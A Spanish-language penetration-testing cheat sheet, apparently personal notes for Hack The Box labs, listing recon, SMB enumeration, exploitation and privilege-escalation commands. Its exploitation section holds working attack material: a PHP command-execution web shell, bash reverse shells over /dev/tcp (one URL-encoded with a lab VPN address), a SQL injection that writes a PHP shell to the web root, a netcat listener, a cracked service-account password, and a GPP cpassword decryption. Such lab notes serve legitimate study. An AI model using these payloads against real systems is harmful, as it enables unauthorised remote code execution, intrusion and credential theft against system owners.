Comandos y recursos

En construcción 🛠

RECONOCIMIENTO Y ESCANEO

Nmap

nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv {IP} -oN escaneo.txt

whatweb

whatweb http://ejemplo.com/

wfuzz

wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://ejemplo.com/FUZZ

dirb

dirb http://ejemplo.com/

DETECTAR EQUIPOS CONECTADOS A MI RED CON NETDISCOVER

netdiscover -i eth0 -r 192.168.0.0/24

DETECTAR EQUIPOS CONECTADOS A MI RED CON ARP-SCAN

arp-scan -I {IFACE} --localnet

smbmap para listar recursos compartidos

smbmap -H 10.10.10.100

smbmap para listar directorios de recursos compartidos

smbmap -H 10.10.10.100 -r Replication
smbmap -H 10.10.10.100 -r Replication/active.htb
smbmap -H 10.10.10.100 -r Replication/active.htb/Policies

smbmap para descargar archivos de recursos compartidos

smbmap -H 10.10.10.100 --download Replication/Groups/Groups.xml

crackmapexec para verificar información

crackmapexec smb 10.10.10.100

crackmapexec para verificar credenciales validas

crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'

crackmapexec para listar recursos compartidos y los permisos en los mismos con credenciales validas

crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares

EXPLOTACIÓN

Código PHP malicioso para ganar Reverse Shell

<?php
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>

Obtención de reverse shell desde navegador

bash -c 'bash -i >& /dev/tcp/{IP}/443 0>&1'

Reverse shell desde navegador URL encodeado

(En mi caso, está URL-encodeado con mi IP que me asigna la VPN de Hack The Box, por el puerto 443)

%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%31%32%2f%34%34%33%20%30%3e%26%31%27

Obtención de reverse shell desde una consola

bash -i >& /dev/tcp/{IP}/443 0>&1

Inyección SQL para listar bases de datos

' UNION SELECT database()-- -

Inyección SQL para crear archivo PHP malicioso para RCE

' union select "<?php system($_REQUEST['cmd']); ?>" into outfile "/var/www/html/revshell.php"-- -

netcat en escucha por el puerto 443

nc -nlvp 443

Configurar proxy de Burp Suite para Firefox

Vamos a abrir Burp Suite y nos vamos a ir a la pestaña de "Proxy":

Vamos a ir a la configuración del proxy de Burp, en la subpestaña de "Proxy settings":

Vemos que el proxy, esta configurado con la IP 127.0.0.1 por el puerto 8080, sabiendo esto, vamos a ir a Firefox en nuestro Kali, y nos vamos a ir a ajustes del navegador o settings:

En el cuadro de busqueda de opciones, vamos a buscar la palabra clave "network"

Vamos a abrir la configuración de red, con el boton "Settings"

Vamos a darla a "Manual proxy configuration" y lo configuraremos con la IP y puerto correspondiente del proxy de Burp, en este caso la IP 127.0.0.1 y el puerto 8080

Vamos a aceptar con el boton "Ok", este paso no necesariamente tiene por que ser así, podemos configurar el proxy de Burp con la extensión de Foxy Proxy

Abrimos Burp Suite de nuevo y nos ponemos en modo intercepción:

gpp-decrypt

gpp-decrypt en Kali Linux se utiliza para descifrar contraseñas almacenadas en los archivos de configuración Groups.xml que son generados por Microsoft Windows en el contexto de las Preferencias de Directiva de Grupo (Group Policy Preferences, GPP).

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

Diccionarios

SecLists
Rockyou

COMPARTIR ARCHIVOS A MAQUINA OBJETIVO

COMPARTIR ARCHIVOS POR SERVIDOR WEB DE PYTHON

sudo python3 -m http.server {puerto, ejemplo 80}

impacket-smbserver para pasar archivos desde SMB

impacket-smbserver {Nombre del recurso compartido} {Directorio a comportir} -smb2support

Ejemplo:

impacket-smbserver recurso $(pwd) -smb2support

Copiar o bajar archivos desde SMB de un recurso compartido en Windows

copy \\{IP VPN HTB}\{Nombre del recurso}\churrasco.exe {Nombre de salida del archivo}

ESCALADO DE PRIVILEGIOS

TRATAMIENTO DE LA TTY

Para crearnos una pseudo-consola donde no tengamos problemas con el teclado ejecutamos lo siguiente:

script /dev/null -c bash
control z
stty raw -echo; fg
reset xterm
export SHELL=bash
export TERM=xterm

Busqueda de archivos SUID

find / -perm -u=s -type f 2>/dev/null

Permisos de un usuario Linux

sudo -l

Capabilities

getcap -r / 2>/dev/null

Permisos de un usuario Windows

whoami /priv

Última actualización